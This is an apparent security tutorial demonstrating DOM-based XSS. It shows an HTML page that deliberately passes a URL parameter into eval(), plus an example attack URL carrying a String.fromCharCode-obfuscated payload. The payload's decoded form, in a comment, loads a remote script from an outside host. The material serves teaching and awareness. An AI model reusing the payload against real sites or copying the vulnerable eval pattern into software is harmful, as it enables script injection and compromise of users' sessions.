DOM XSS 101 Walk-Through

1. DOM XSS 101 Walk-Through
2. *******
3. Blog discussing this: http://neonprimetime.blogspot.com/2016/01/dom-xss-101-walk-through.html
4. *******
5. <html>
6. <body>
7. <script type="text/javascript">
8.     function logUserId(userid){
9.         console.log('debug: userid found was \'' + userid + '\'');
10.     }
11.     var myurl = window.location.href;
12.     var useridstartindex = myurl.indexOf("userid=") + 7;
13.     var userid = myurl.substring(useridstartindex,myurl.length);
14.     var calllogfunction = 'logUserId(' + userid.toString() + ')'
15.     eval(calllogfunction);
16. </script>
17. </body>
18. </html>
19. <!-- DOM XSS Example url: hxxp://myurl.com/domxsstest.html?userid=123456);eval(String.fromCharCode(115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,110,101,111,110,112,114,105,109,101,116,105,109,101,46,98,108,111,103,115,112,111,116,46,99,111,109,47,102,97,107,101,104,111,111,107,46,106,115,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59))// -->
20. <!-- DOM XSS Example code: s=document.createElement('script'); s.src='http://neonprimetime.blogspot.com/fakehook.js'; document.getElementsByTagName('head')[0].appendChild(s); -->
21.  
22.  
23. *******
24. *******
25. *******
26. More FROM @neonprimetime security
27.  
28. http://pastebin.com/u/Neonprimetime
29. https://www.virustotal.com/en/USER/neonprimetime/
30. https://twitter.com/neonprimetime
31. https://www.reddit.com/USER/neonprimetime